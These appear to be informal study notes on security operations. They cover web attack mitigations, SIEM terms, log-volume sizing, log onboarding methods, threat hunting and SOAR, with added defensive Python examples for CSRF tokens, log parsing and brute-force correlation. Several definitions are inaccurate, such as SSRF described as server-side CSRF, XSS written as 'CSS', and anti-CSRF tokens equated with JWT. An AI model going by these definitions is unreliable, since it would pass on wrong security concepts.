For an already existing connection between the end user and the application, the attacker comes in as a middle man and performs URL redirection or URL manipulation, or takes the user to a defaced or fake website; finally the attacker gains unauthorised access or causes sensitive data exposure.

Two different types of cross site request forgery attack
1) Client side (CSRF)
2) Server side (SSRF)

Mitigations
1) Input validation
2) Parameterized queries
3) WAF
4) SIEM tool (CSRF and SSRF attacks)
5) By implementing an anti-CSRF (JWT) token; honeypot - network
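The header-level controls these notes list for the client side (HttpOnly/Secure cookie flags, content security policy, and the anti-CSRF token of mitigation 5), as an added example that is not from the notes: the token is bound to the session with an HMAC so a token issued for one session does not verify for another. The secret key, session ids, cookie name and the allowed script origin are constructed for the example.

```python
# Added example (not from the notes): response headers and an HMAC-bound
# anti-CSRF token, using only the Python standard library.
import hashlib
import hmac
import secrets
from typing import Dict

# Per-deployment secret; generated here for the example, never hard-coded in practice.
SECRET_KEY = secrets.token_bytes(32)


def session_cookie(session_id: str) -> str:
    # HttpOnly: page scripts cannot read the cookie (limits cookie theft via XSS).
    # Secure: only sent over HTTPS.  SameSite=Strict: not attached to cross-site
    # requests, which is what a CSRF attempt relies on.
    return f"session={session_id}; HttpOnly; Secure; SameSite=Strict; Path=/"


def csp_header(allowed_script_origin: str) -> str:
    # Scripts only from our own origin plus one allowed origin, no inline scripts;
    # frame-ancestors 'none' refuses to be framed, which blocks click jacking.
    return (
        f"default-src 'self'; script-src 'self' {allowed_script_origin}; "
        "object-src 'none'; frame-ancestors 'none'"
    )


def issue_csrf_token(session_id: str) -> str:
    """Token = random nonce + HMAC(secret, session_id:nonce)."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SECRET_KEY, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_csrf_token(session_id: str, token: str) -> bool:
    """Recompute the MAC for this session; constant-time compare."""
    try:
        nonce, mac = token.split(".", 1)
    except ValueError:
        return False  # malformed token
    expected = hmac.new(SECRET_KEY, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)


def response_headers(session_id: str, allowed_script_origin: str) -> Dict[str, str]:
    """Headers a login response would carry; the CSRF token is also embedded in forms."""
    return {
        "Set-Cookie": session_cookie(session_id),
        "Content-Security-Policy": csp_header(allowed_script_origin),
        "X-CSRF-Token": issue_csrf_token(session_id),
    }


if __name__ == "__main__":
    hdrs = response_headers("sess-A", "https://cdn.example.com")  # constructed values
    print(verify_csrf_token("sess-A", hdrs["X-CSRF-Token"]))  # True
    print(verify_csrf_token("sess-B", hdrs["X-CSRF-Token"]))  # False
```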

Buffer overflow attack: when the input field of the web application receives more bytes than the developer defined, it occupies more space or storage and finally the system becomes unavailable, damaged or crashed.
Mitigation
1) Developers have to define the buffer at the time of developing the input validation provided to the user, keeping it within limits
2) Educate and give awareness training to all the developers

MITM (Man in the middle attack): the attacker comes in as a middle man between the end user and the application or backend server, then applies TTPs on the application side (taking the user to a defaced or fake website, URL manipulation, spoofing, URL redirection, stealing tokens etc.) and finally gains unauthorised access and causes sensitive data exposure.

Examples
Session hijacking
CSRF
SSRF
CSS (stored, reflected and DOM)
VPN authentication failures
Spoofing category of attacks

Mitigations
1) Input validation
2) CSP
3) Parameterized queries
4) Strong password policies
5) Anti-CSRF token
6) SSL/TLS certificates using digital signatures
Cyber Security
Definition: safeguarding or protecting endpoints, assets, databases, network, servers, applications, cloud, infrastructure etc. from attackers 24*7*365 is called cyber security.

SIEM: SIEM = SIM + SEM
Term from 2005, as per the Gartner report (Amrit Williams and Stefan, USA)

Definition of SIEM: a tool for log collection, log processing, log monitoring (real time monitoring), log analysis, incident monitoring, security incident alerting and security incident investigation.

SOC (Security Operation Center): a dedicated room or site where our cyber security analysts or information security analysts sit together and monitor 24*7*365 days; whenever a security incident is triggered, the SOC team (L1, L2 & L3) takes care of the security incident investigations and also forensic analysis.

SOC alternative names
CERT - Computer emergency response team (public and govt sector)
CSIRT - Cyber security incident response team
SIRT - Security incident response team
CDC - Cyber defence center
MSS team - Managed security services (endpoint, network, cloud, cyber, application and product)
Blue team (defensive)

Levels under the SOC
L1 or Level 1 or Tier 1: cyber security analyst, information security analyst, security analyst; 0-4 years; false positive or true positive triage
L2 or Level 2 or Tier 2: IR (incident responder), senior cyber security analyst, senior information security analyst, senior security analyst, threat detector; 4-7 years
L3 or Level 3 or Tier 3: threat hunters, SME, team leads, POC, SPOC, reverse engineers, malware analysis; 6+ years
L4 or SOC manager: people management of L1, L2, L3 and also technical management

Log: any computer-recorded activity or action performed by each and every employee, asset etc.

Log types of end user machines (Windows)
Security or audit related logs (authentication failure and also authentication success)
Application
System (performance)
Setup or config

Event: an abnormal change in the log is called an event.

Alert: notification of an incident is called an alert. Alert channels:
1) Email
2) Mobile
3) SNMP traps
4) Reference set
5) Security tool dashboard
6) Syslog

Incident: something that negatively impacts the CIA triad of the organization, causing confidentiality or privacy issues, integrity related issues, or business outage or business disruption.

EPS (Events per second): how many events or logs per second are generated by a data source or log source
EPM (Events per minute): how many logs are generated per minute
EPY (Events per year): how many events are generated per year

FPS (Flow per second): flow = traffic in the form of IP packets; how much flow data is generated per second in the form of IP packets
FPM (Flow per minute): how much flow data is generated per minute
FPY (Flow per year): how much flow data is generated per year

SIEM tool license: based on the total number of end users in the organization, or on how much data is generated per day (GB/DAY)

Data source or log source: where the logs or data are generated from is called the data source or log source.

Examples of data sources / log sources
1) Security data sources or log sources: EDR, XDR, DLP, endpoint encryption, HIDS/HIPS, FIM, MDM, NGFW, NIDS/NIPS, proxy or web gateway, SAST scans, DAST, WAF, VM tools, email GW / email security, CSPM
2) Network data sources or log sources: hub, switch, router, LB, WLAN, LAN, DNS, DHCP, DDI
3) Infrastructure data sources or log sources: all the servers, all the endpoints, all the databases
4) Application: all the applications (on-premise / cloud)
5) Cloud: AWS, Azure, GCP, OCI, Alibaba, IBM etc.

Total EPS / FPS calculation

Data source / Log source name | Quantity (b) | EPS per one data source (c) | Total EPS (b*c) | FPS per one data source | Total FPS
Firewall | 20 | 100 | 2000 | 50 | 1000
AD | 10 | 50 | 500 | 50 | 500
EDR | 1 | 500 | 500 | 500 | 500
Router, Switch, LB, WAF, Servers, DB, end points, Email GW, DB servers, web servers, file servers, Application, DLP, Cloud, encryption, Proxy, NIDS/NIPS, SAST, DAST, VM: rows to be filled in the same way

Total EPS count (2024): 10000
Overall EPS count, allowing 30% growth per year:
2024: 10000 + 10000*30% = 10000 + 3000 = 13000
2025: 13000 + 13000*30% = 16900
2026: 16900 + 16900*30% = 21970

Calculation of GB/day, taking the total EPS count = 13000

Events per day = events per second * 24 * 60 * 60
13000 * 24 * 60 * 60 = 1,123,200,000

Events per year = events per day * 365
1,123,200,000 * 365 = 409,968,000,000

Bytes per year before compression (1 event = 500 bytes, or 400 bytes) = events per year * bytes per event
409,968,000,000 * 500 = 204,984,000,000,000 bytes

Compression ratio: we consider 1:10, 1:15 or 1:17.
After compression (total number of bytes) = bytes per year * 1/10
20,498,400,000,000 bytes per year
= 20,498.4 GB/year
= 20.4984 TB/year
= 0.0205 PB/year
Per day: 1,123,200,000 * 500 / 10 = 56,160,000,000 bytes = 56.16 GB/day (this is the licensing figure)

IBM QRadar SIEM rule of thumb: 1000 EPS for 90 days = 6.5 TB
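The sizing arithmetic above, as an added example that is not part of the original notes. It implements the EPS -> events/day -> bytes/year -> compressed storage chain, the 30% year-on-year growth projection, and the QRadar rule of thumb quoted here (1000 EPS for 90 days = 6.5 TB), which the QRadar storage example later in the notes also uses. Event size, compression ratio and growth rate are parameters; the defaults are the values the notes use, and the sample sources are the three filled-in rows of the table above.

```python
"""SIEM sizing calculator (added example, not from the original notes)."""
from dataclasses import dataclass

SECONDS_PER_DAY = 24 * 60 * 60
DAYS_PER_YEAR = 365


@dataclass(frozen=True)
class LogSource:
    name: str
    quantity: int          # column b: number of devices of this type
    eps_each: float        # column c: events per second from one device
    fps_each: float = 0.0  # flows per second from one device (0 if it sends no flows)


# Constructed from the three filled-in rows of the sizing table in the notes.
SAMPLE_SOURCES = [
    LogSource("Firewall", 20, 100, 50),
    LogSource("AD", 10, 50, 50),
    LogSource("EDR", 1, 500, 500),
]


def total_eps(sources):
    """Sum of quantity * EPS per device (the b*c column)."""
    return sum(s.quantity * s.eps_each for s in sources)


def total_fps(sources):
    """Sum of quantity * flows per second per device."""
    return sum(s.quantity * s.fps_each for s in sources)


def project_growth(eps, years, growth=0.30):
    """[eps, eps*(1+g), eps*(1+g)^2, ...]: the 'overall EPS' figure per year."""
    series = [eps]
    for _ in range(years):
        series.append(round(series[-1] * (1 + growth), 2))
    return series


def events_per_day(eps):
    return eps * SECONDS_PER_DAY


def events_per_year(eps):
    return events_per_day(eps) * DAYS_PER_YEAR


def gb_per_day(eps, bytes_per_event=500, compression=10.0):
    """Compressed ingest per day in GB (1 GB = 1e9 bytes), the licensing unit."""
    return events_per_day(eps) * bytes_per_event / compression / 1e9


def tb_per_year(eps, bytes_per_event=500, compression=10.0):
    """Compressed storage for one year of retention, in TB."""
    return gb_per_day(eps, bytes_per_event, compression) * DAYS_PER_YEAR / 1000


def qradar_storage_tb(eps, retention_days, tb_per_1000eps_90days=6.5):
    """Scale the notes' rule of thumb linearly in EPS and in retention days."""
    return tb_per_1000eps_90days * (eps / 1000) * (retention_days / 90)


if __name__ == "__main__":
    base = 10000  # the notes' total EPS count for 2024
    for year, eps in zip(range(2024, 2027), project_growth(base, 2)):
        print(year, eps)
    print("GB/day at 13000 EPS:", round(gb_per_day(13000), 2))
    print("TB/year at 13000 EPS:", round(tb_per_year(13000), 4))
    print("QRadar TB for 5000 EPS, 1 year:", round(qradar_storage_tb(5000, 365), 1))
```

Changing `compression` to 15 or 17, or `bytes_per_event` to 400, reproduces the alternative figures the notes mention; the growth projection should be rerun each year against measured EPS rather than the original estimate.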

Aggregation: collecting the logs from different types of data sources and log sources, and from different geographical locations.
Example: different types of data sources or log sources; different locations (applicable to a distributed deployment).

Parsing: converting the raw log format into a SIEM-understandable or readable format is called parsing.
Example formats:
JSON
Syslog
HTML
XML
BSD syslog
CEF (Common Event Format): used by all other SIEM tool vendors
LEEF (Log Event Extended Format): IBM QRadar
JavaScript

Interview question: Do you know parsers, or did you develop any parsers at any time?
No, I did not develop any parsers at any time, but I used to coordinate with the SIEM tool vendor to resolve the parsing-related issues by providing the raw log.

Filtering: filtering is based on several parameters like
1) Timestamp
2) Log source / data source
3) Payload
4) IP address
5) Hostname
6) Attacker IP address
7) Action of the data source

Querying: asking a question and getting the response from the full pool of logs is called querying.

SIEM tool | Query language | Usability
IBM QRadar | AQL, PGSQL | User friendly
Splunk | SPL | Have to write queries
Azure Sentinel | KQL | Have to write queries
McAfee | SQL | Not user friendly
HP ArcSight | SQL | User friendly
DNIF | DQL | Have to write queries
Exabeam | SQL | Have to write queries
RSA | SQL | User friendly
LR (LogRhythm) | SQL | User friendly

Normalization: converting a bigger raw log into a smaller raw log; rescaling of the log.

Indexing: grouping of similar types of log sources or data sources. By default every SIEM tool will use the default index * (all the logs, i.e. the whole pool of logs).

Correlation: linking one event with another event (normal vs abnormal event).
Correlation rule or policy: linking one event with another event based on a condition or logic (boolean algebra functions); the outcome is alert or allow.
Correlation rule = use case = attack.
Note: for each and every attack we will create a correlation rule, i.e. a boolean algebra condition or logic.

Examples
Multiple authentication login failure attempts are coming from the same source name
Multiple authentication login failures are coming from the same source IP
Login failures are coming from a disabled account
Login failures are coming from a terminated account
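The parsing, normalization and correlation steps above, run over constructed sample log lines, as an added example that is not part of the original notes. One small pipeline parses lines in BSD syslog, CEF, LEEF and Windows-event JSON shape, normalizes them onto a common schema, and runs the second use case listed above (multiple authentication failures from the same source IP), which is also the logic of the 4625 brute-force KQL query at the end of the notes. The regexes are this example's own simplifications of the formats, not a vendor DSM; the field names, hosts, users and IPs in the sample lines are constructed.

```python
"""Parse -> normalize -> correlate pipeline (added example, not from the original notes)."""
import json
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

ASSUMED_YEAR = 2024  # assumption: BSD syslog timestamps carry no year

# ---- parsing: raw line -> (format, dict of vendor fields) ----------------
_BSD = re.compile(
    r"^<(?P<pri>\d{1,3})>(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d\d:\d\d:\d\d) "
    r"(?P<host>\S+) (?P<app>[^:\s]+):\s*(?P<msg>.*)$"
)
_CEF = re.compile(
    r"^CEF:\d+\|(?P<vendor>[^|]*)\|(?P<product>[^|]*)\|[^|]*\|"
    r"(?P<sig>[^|]*)\|(?P<name>[^|]*)\|(?P<sev>[^|]*)\|(?P<ext>.*)$"
)
_LEEF = re.compile(
    r"^LEEF:[^|]*\|(?P<vendor>[^|]*)\|(?P<product>[^|]*)\|[^|]*\|"
    r"(?P<event_id>[^|]*)\|(?P<ext>.*)$"
)
_CEF_KV = re.compile(r"(\w+)=(.*?)(?=\s\w+=|$)")  # CEF extension values may contain spaces
_IPV4 = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")
_USER = re.compile(r"\buser (\S+)")


def parse(raw):
    """Detect the format by its prefix and return (format, vendor fields)."""
    if raw.startswith("CEF:"):
        m = _CEF.match(raw)
        if not m:
            raise ValueError("bad CEF header")
        f = m.groupdict()
        f.update(_CEF_KV.findall(f.pop("ext")))
        return "cef", f
    if raw.startswith("LEEF:"):
        m = _LEEF.match(raw)
        if not m:
            raise ValueError("bad LEEF header")
        f = m.groupdict()
        ext = f.pop("ext")  # LEEF attributes are tab-delimited key=value pairs by default
        f.update(kv.split("=", 1) for kv in ext.split("\t") if "=" in kv)
        return "leef", f
    if raw.startswith("{"):
        return "json", json.loads(raw)
    m = _BSD.match(raw)
    if m:
        f = m.groupdict()
        f["facility"], f["severity"] = divmod(int(f.pop("pri")), 8)  # PRI = facility*8 + severity
        return "bsd", f
    raise ValueError("unrecognised log format: " + raw[:40])


# ---- normalization: vendor fields -> one common schema --------------------
def _is_failure(text):
    text = text.lower()
    return "failed" in text or "failure" in text


def normalize(fmt, f):
    """Map vendor field names onto ts / src_ip / user / event_id / outcome / log_source."""
    if fmt == "json":  # constructed Windows Security event shape
        eid = int(f["EventID"])
        ip = f.get("IpAddress")
        return {"ts": datetime.fromisoformat(f["TimeCreated"]),
                "src_ip": None if ip in (None, "-") else ip,
                "user": f.get("TargetUserName"), "event_id": str(eid),
                "outcome": {4625: "failure", 4624: "success"}.get(eid, "other"),
                "log_source": f.get("Computer")}
    if fmt == "cef":  # rt is epoch milliseconds
        return {"ts": datetime.fromtimestamp(int(f["rt"]) / 1000, tz=timezone.utc),
                "src_ip": f.get("src"), "user": f.get("suser"), "event_id": f["sig"],
                "outcome": "failure" if _is_failure(f.get("outcome", "")) else "other",
                "log_source": f["product"]}
    if fmt == "leef":  # devTime assumed ISO 8601 in the sample
        return {"ts": datetime.fromisoformat(f["devTime"]), "src_ip": f.get("src"),
                "user": f.get("usrName"), "event_id": f["event_id"],
                "outcome": "failure" if _is_failure(f["event_id"]) else "other",
                "log_source": f["product"]}
    if fmt == "bsd":
        ts = datetime.strptime(f"{ASSUMED_YEAR} {f['ts']}", "%Y %b %d %H:%M:%S")
        ip, user = _IPV4.search(f["msg"]), _USER.search(f["msg"])
        return {"ts": ts.replace(tzinfo=timezone.utc),
                "src_ip": ip.group(1) if ip else None,
                "user": user.group(1) if user else None, "event_id": f["app"],
                "outcome": "failure" if _is_failure(f["msg"]) else "other",
                "log_source": f["host"]}
    raise ValueError(fmt)


# ---- correlation rule: N auth failures from one source IP in a window ----
def correlate_auth_failures(events, threshold=5, window=timedelta(minutes=10)):
    """Fire once when a source IP reaches `threshold` failures inside a sliding window."""
    alerts, by_src = [], defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):
        if e["outcome"] != "failure" or not e["src_ip"]:
            continue
        bucket = by_src[e["src_ip"]]
        bucket.append(e)
        while e["ts"] - bucket[0]["ts"] > window:  # drop failures older than the window
            bucket.pop(0)
        if len(bucket) == threshold:
            alerts.append({"rule": "multiple_auth_failures_same_source", "src_ip": e["src_ip"],
                           "count": len(bucket), "first": bucket[0]["ts"], "last": e["ts"],
                           "users": sorted({x["user"] for x in bucket if x["user"]})})
    return alerts


def _win(event_id, ts, user, ip, computer="DC01"):
    """One constructed Windows Security event in JSON shape."""
    return json.dumps({"EventID": event_id, "TimeCreated": ts, "Computer": computer,
                       "TargetUserName": user, "IpAddress": ip})


SAMPLE_LINES = [  # constructed; 203.0.113.7 and 198.51.100.9 are documentation addresses
    _win(4625, "2024-03-04T10:15:00+00:00", "administrator", "203.0.113.7"),
    _win(4625, "2024-03-04T10:15:05+00:00", "carol", "198.51.100.9"),
    _win(4625, "2024-03-04T10:15:10+00:00", "administrator", "203.0.113.7"),
    _win(4625, "2024-03-04T10:15:20+00:00", "bob", "203.0.113.7"),
    _win(4625, "2024-03-04T10:15:30+00:00", "administrator", "203.0.113.7"),
    _win(4625, "2024-03-04T10:15:40+00:00", "svc_backup", "203.0.113.7"),
    _win(4624, "2024-03-04T10:16:00+00:00", "administrator", "203.0.113.7"),
    "CEF:0|Acme|EDR|2.1|100|Interactive logon failed|5|"
    "rt=1709547370000 src=203.0.113.7 suser=svc_backup outcome=failure msg=Bad password for svc_backup",
    "<38>Mar  4 10:16:30 fw01 sshd: Login failed for user root from 203.0.113.7 port 52211",
    "LEEF:1.0|Acme|VPN|1.0|AuthFailure|src=203.0.113.7\tusrName=alice\tdevTime=2024-03-04T10:16:50+00:00",
]


def run(lines):
    """Parse and normalize every line, then apply the correlation rule."""
    events = [normalize(*parse(line)) for line in lines]
    return events, correlate_auth_failures(events)


if __name__ == "__main__":
    for alert in run(SAMPLE_LINES)[1]:
        print(alert)
```

The rule fires on the fifth failure from 203.0.113.7 and stays silent for 198.51.100.9, which has one failure; the later CEF, BSD and LEEF failures from the same IP extend the bucket without re-alerting until the window slides. Normalizing first is what makes one rule cover four log formats.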

Retention policy: how many days we are storing the logs. It depends on
1) Compliance
2) The business we are doing
3) Tracking of the incidents

For example: ISO 27001 does not fix a period, 1 year online is a common choice; PCI DSS requires at least 12 months of log history with the most recent 3 months immediately available (e.g. 3 months online and 9 months offline).

Online logs = the inbuilt storage the SIEM tool is providing.
Offline storage = dumping into third-party storage:
Cloud drives
SAN
NAS
Magnetic tapes
External hard disk

Log integration or log onboarding or log collection methods

Logging mechanism types:
1) Push mechanism: log in to the data source or log source and send the logs from the data source to the SIEM tool.
2) Pull mechanism: log in to the SIEM tool and fetch the logs from the data sources or log sources.
3) Hybrid: a combination of push and pull mechanisms.

Log integration methods:
1) Syslog server method
2) API token method
3) Collector agent
4) Flow collector (IBM QRadar, HP ArcSight and McAfee)
5) Cloud connector
6) WMI
7) MSRPC
8) Apps method

1) Syslog server method (push mechanism)
This method is applicable to all the network devices (FW, proxy, router, switch, LB, all the servers, etc.).
1) Log in to the data source or log source (network device or server, e.g. a Palo Alto/Fortigate firewall or a router)
2) Click on the servers tab
3) Click on the syslog server option
4) Do the below configuration
SIEM tool name | SIEM host name | SIEM tool IP address | Port number | Protocol | Log format
IBM QRadar | TCSHYDSIEM.COM | 10.10.10.1 | 514 | TCP | Syslog
5) Save the config and also test connectivity

After configuring the syslog server option, for verification log in to the SIEM tool and verify whether the logs are reflecting in the SIEM tool or not. There are two options:

Option 1) Logs are reflecting in the SIEM tool: we are fine and all is good.

Option 2) Logs are not reflecting or coming in the SIEM tool:
1) Verify the syslog configuration in the log source or data source.
2) Take a packet capture file (PCAP) with tcpdump. It gives network traffic analysis between source and destination, which is walked through layer by layer using the TCP/IP reference model:
- Application layer: verify between source and destination whether there are client-side errors or server-side errors, whether all the HTTP requests and HTTP responses are happening properly (including OpenID Connect with OAuth 2.0 and JWT token-based mechanisms where they are used), and additionally whether the DNS records are configured properly or not.
- Transport layer: verify between source and destination that all the TCP flags are set properly and whether the TCP three-way handshake completes successfully or not.
- Network or Internet layer: verify packet routing between source and destination: is the packet retransmitted, blocked or allowed?
- Network interface or Ethernet layer: are there any physical connectivity issues with cables, any VLAN configuration issues, and are the frames showing any half-duplex / full-duplex (duplex mismatch) issues?

Incident handling phases referenced here: preparation, identification, triage, evidence and reporting.
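A connectivity test for the syslog server method, as an added example that is not part of the original notes: it builds one RFC 5424 syslog message, frames it for TCP the way most receivers expect (RFC 6587 octet counting), sends it to the SIEM listener, and maps any failure onto the layer of the checklist above that should be looked at next. Host and port default to the values in the configuration table above (10.10.10.1, TCP 514); the hostname and app name are assumptions.

```python
"""Syslog connectivity test for SIEM onboarding (added example, not from the original notes)."""
import socket
from datetime import datetime, timezone

FACILITY = {"kern": 0, "user": 1, "auth": 4, "syslog": 5, "authpriv": 10, "local0": 16, "local4": 20}
SEVERITY = {"emerg": 0, "alert": 1, "crit": 2, "err": 3, "warning": 4, "notice": 5, "info": 6, "debug": 7}
SAMPLE_TS = datetime(2024, 3, 4, 10, 15, 0, tzinfo=timezone.utc)  # fixed time for the demo


def pri(facility, severity):
    """PRI = facility * 8 + severity (RFC 5424, section 6.2.1)."""
    return FACILITY[facility] * 8 + SEVERITY[severity]


def build_rfc5424(msg, hostname="fw01", app="siem-test", facility="local4", severity="notice", ts=None):
    """<PRI>1 TIMESTAMP HOSTNAME APP-NAME PROCID MSGID STRUCTURED-DATA MSG, nil fields as '-'."""
    ts = ts or datetime.now(timezone.utc)
    return f"<{pri(facility, severity)}>1 {ts.isoformat(timespec='seconds')} {hostname} {app} - - - {msg}"


def frame_tcp(line):
    """RFC 6587 octet-counting framing: 'MSG-LEN SP SYSLOG-MSG'."""
    data = line.encode("utf-8")
    return f"{len(data)} ".encode("ascii") + data


def send_test(host="10.10.10.1", port=514, proto="tcp", timeout=3.0):
    """Return (ok, layer_to_check, detail); layer names follow the checklist in the notes."""
    line = build_rfc5424("SIEM onboarding connectivity test")
    socktype = socket.SOCK_STREAM if proto == "tcp" else socket.SOCK_DGRAM
    try:
        family, stype, _, _, addr = socket.getaddrinfo(host, port, type=socktype)[0]
    except socket.gaierror as exc:
        return False, "application (DNS resolution)", str(exc)
    try:
        with socket.socket(family, stype) as s:
            s.settimeout(timeout)
            if proto == "tcp":
                s.connect(addr)                 # three-way handshake
                s.sendall(frame_tcp(line))      # data accepted by the listener
            else:
                s.sendto(line.encode("utf-8"), addr)  # UDP gives no delivery confirmation
        return True, "none", "sent"
    except ConnectionRefusedError as exc:
        return False, "transport (host reachable, no listener on the port: RST)", str(exc)
    except socket.timeout:
        return False, "network (SYN dropped: filtered, mis-routed, or host down)", "no SYN-ACK within timeout"
    except OSError as exc:
        return False, "network/link (route, interface or address problem)", str(exc)


if __name__ == "__main__":
    print(build_rfc5424("hello", ts=SAMPLE_TS))
    print(send_test())
```

A refused connection points at the SIEM side (listener not bound, wrong port or protocol); a timeout points at the path (firewall, routing, VLAN); a resolver error points at DNS. A successful UDP send proves only that the packet left the host, which is why the notes still ask for a PCAP.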

2) Collector agent
This method is applicable to integrate either all the endpoint logs or any server logs into the SIEM tool. Vendor-provided software has to be installed on the end user machine, and the below configuration has to be done:

Source IP | Destination IP | Port number | Protocol
Data source or log source IP | SIEM tool IP | 443 | TCP
 | | 8443 | TCP
 | | 9093 | TCP

Thereafter save the configuration.

Option 1) Logs are reflecting in the SIEM tool.
Option 2) Logs are not reflecting in the SIEM tool. In case logs are not reflecting, do the below actions:
1) Wake up (restart) the log collector agent
2) Uninstall and reinstall the agent once again
3) Take the packet capture and analyse it, e.g. cmd> tcpdump -i <interface> -w capture.pcap
4) Import the file into Wireshark and do the TCP/IP layer analysis
5) Raise a case with the vendor to fix the problem

3) Flow collector method (push mechanism)
This method is applicable to SIEM tools like IBM QRadar, HP ArcSight and McAfee. All the critical or non-critical flow data is integrated either via SNMP traps, or directly by configuring one of the switch or router interfaces as a SPAN/mirror/tap port and connecting it to the SIEM tool.

Verification is the same two-option check as for the syslog server method: either the flows are reflecting in the SIEM tool and we are fine, or they are not, in which case verify the configuration on the data source and take a PCAP for TCP/IP layer analysis.

4) API token method (pull mechanism)
On the SaaS-based tool (e.g. EDR):
1) Log in to the tool
2) Go to the API token option
3) Generate the API token URL, access key and secret key
4) Take the API token URL and key information
On the SIEM tool:
1) Log in to the SIEM tool
2) Select the log source as the SaaS-based tool (EDR)
3) Provide the access key, secret key and URL taken from the SaaS-based tool
4) Save the configuration

Verification is the same two-option check as for the syslog server method: either the logs are reflecting in the SIEM tool and we are fine, or they are not, in which case verify the configuration on the data source and take a PCAP for TCP/IP layer analysis.
5) Apps method
This method is applicable only to Splunk. Splunk supports three different types of log integration methods:
1) Collector agent (using a forwarder)
2) Syslog server
3) Apps method
The apps method can be used to integrate an unknown log source or data source into the SIEM tool when the syslog server option and the collector agent method do not apply.

Verification is the same two-option check as for the syslog server method: either the logs are reflecting in the SIEM tool and we are fine, or they are not, in which case verify the configuration on the data source and take a PCAP for TCP/IP layer analysis.
6) Cloud connector method (push and pull: hybrid mechanism)
This method is applicable to integrating cloud service provider logs into the SIEM tool.
Examples:
AWS
Azure
GCP
Alibaba
OCI
IBM
Cloudflare
Cloud connector examples: Skyformation, IBM, Alibaba, Oracle, Fortigate.

Example: how to integrate AWS logs into the SIEM tool
Data flow: AWS (Hadoop/data science workload) --pull--> cloud connector --push--> Exabeam
Pull side, on AWS:
1) Log in to the account
2) Note the AWS region name
3) Then configure CloudTrail (security audit)
4) Configure CloudWatch (system, setup, application)
5) Generate the access key and secret key
6) Save the configuration
Pull side, on the cloud connector:
1) Log in to the cloud connector
2) Select log source AWS
3) Provide the region, access key and secret key
4) Save the config
Push side, from the cloud connector to the SIEM tool:
1) Go to the settings tab
2) Click on the syslog server
3) Do the below config
SIEM tool name | IP address | Port number | Protocol | Log format
Exabeam | 10.10.10.1 | 514 | tcp | bsd
4) Do the test connectivity
5) Save the configuration

Verification is the same two-option check as for the syslog server method: either the logs are reflecting in the SIEM tool and we are fine, or they are not, in which case verify the configuration on the data source and take a PCAP for TCP/IP layer analysis.
3) If after doing the analysis you are still facing issues, raise a case with the vendor to fix the log issue.

7) WMI (Windows Management Instrumentation)
To integrate Windows logs into the SIEM tool we use the WMI method. Drawback: in case the logs are generated at more than 50 EPS, this method will not be useful.

8) MSRPC (Microsoft Remote Procedure Call)
This method is applicable to integrate all Windows logs into the SIEM tool. This method will also support more than 50 EPS.
Supported vendors
1) IBM QRadar
2) HP ArcSight
3) LogRhythm
4) McAfee

Incident investigation: a step-by-step or phase-by-phase process of taking care of the incident investigation or forensic analysis.
Incident response framework: whenever any security incident is triggered, based on ITIL or NIST we take care of the end-to-end incident investigation.
Forensic analysis: doing in-depth analysis for the security incident investigation.
Forensic types are
1) Analog forensics (physical): take the hardware and connect our forensic tool to the physical hardware device.
2) Digital forensics: snapshot or image (E01, E02, E03 ... image segments). Artefacts examined include malware (YARA), thumbnails, DLP data and fingerprints.
Example tools are EnCase, Oxygen, AccessData (FTK), Cellebrite.
TIF (Threat intelligence feeds): threat intelligence feeds are regular updates from different types of news channels or vendors, from which we get what vulnerabilities, threats and issues are going on worldwide. We receive these TIFs in the form of feeds.

Example threat intelligence feeds are
1) OSINT (Open source intelligence)
2) Check Point (CSP and firewall)
3) CrowdStrike (EDR, XDR, CSPM)
4) IBM X-Force, McAfee GTI, Splunk GTI, LT, GTI, etc.
5) Mandiant
6) SDK
7) Palo Alto XSOAR, endpoint Cortex

Note: whenever we receive TIF from the different vendors or open source tools (IP addresses, domain names, URL links, hash values), wherever possible, after doing the BIA and risk assessment, try to block those malicious IP addresses, domain names, hash values and URL links proactively in our tools.

Note 2: threat intelligence feed analysis, with the related BIA and risk assessment, indirectly drives proactive threat hunting.

Correlation rules are of two types: default (out of the box) and customized.

CRE engine: every SIEM tool uses an engine to process the configured correlation rules; it is called the CRE (correlation rule engine).
Note: processing of the correlation rules happens in the log manager or log processor or data processor or node.
Note 2: all SIEM tool vendors call the correlation rule engine the CRE engine except LogRhythm. On the LogRhythm side the CRE engine is called the AIE (Advanced Intelligence Engine).

Threat hunting: hunting for threats or attacks or vulnerabilities proactively is called threat hunting.
Threat hunting types are
A) Automated threat hunting: based on correlation rule creation or policy creation using a condition or algorithm or logic, i.e. boolean algebra functions.
B) Manual threat hunting: hypothesis, assumptions, query based, trial and error.

Examples
1) Multiple authentication login failures from an internal or external IP (Windows Event ID 4625), over 1 week: 100 hits from the automated rule; after filtering (multiple authentication failures, 1 week) 90 remain. Tools: Splunk, Exabeam, ELK, Sentinel, Securonix (Windows); IBM QRadar, LR, RSA, FortiSIEM, AlienVault.
2) Impossible travel attack for VPN, over 1 day: 20 hits from the automated rule, 19 after manual hunting.

C) Threat hunting also depends on some other parameters:
Vulnerability management
Risk management and risk assessment
Threat intelligence feed integration
UEBA (ML + AI): unknown category of attacks
SOAR

UEBA (UBA) = UBA + EBA
User behavioural analytics (ML + AI + mathematical + data analytics + statistics) plus entity behavioural analytics (endpoints, DB, servers, network devices etc.). Example: malware IR within 4 hours.
UEBA is applicable to the new categories of attacks being done by the attackers (e.g. new ransomware versions such as Akira 1.10 and LockBit 4.0).
Example (Exabeam): user Ramesh accesses Facebook.com; UEBA checks this against past or historical behaviour and the alert is classified as false positive or true positive.

SOAR (Security orchestration and automated response). Orchestration = planning; AIR = automated incident response.

Example flow
Log source or data source | Log integration method
1) AV/EDR/XDR - Carbon Black | Syslog/API
2) NGFW - Palo Alto | Syslog
3) Malware analysis | Syslog
4) Phishing email via malware attachment | Syslog/API
Syslog port 514. Data sources such as EDR, FW, proxy and DNS feed the SIEM (LC, LP and ESM); a correlation rule for the malware attacker (attacker IP 1.1.1.1, hash value abcd0101defghij) triggers; SOAR (Palo Alto XSOAR, CrowdStrike SOAR) then blocks the attacker IP on the NGFW and the hash value on the EDR:
EDR = hash value
NGFW = IP

SIEM | SOAR
IBM QRadar | IBM Resilient
